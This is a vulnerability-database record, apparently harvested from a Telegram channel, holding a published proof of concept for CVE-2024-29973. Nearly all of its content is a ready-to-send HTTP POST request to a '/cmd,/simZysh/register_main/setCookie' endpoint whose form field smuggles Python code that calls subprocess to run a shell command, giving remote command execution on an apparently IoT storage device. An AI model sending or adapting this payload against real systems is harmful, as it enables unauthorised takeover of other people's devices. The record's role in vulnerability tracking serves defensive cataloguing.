{"uuid": "ab24fd52-38ae-4b3d-8ddd-ec810ab05da9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-29973", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2688", "content": "cve-2024-29973  rce\n\nPOST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: your-ip\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6\n\n------WebKitFormBoundaryHHaZAYecVOf5sfa6\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or import(\"subprocess\").check_output(\"id\", shell=True)#\n------WebKitFormBoundaryHHaZAYecVOf5sfa6--\n\nid \n\n#exploit #poc #IoT", "creation_timestamp": "2024-07-04T04:43:45.000000Z"}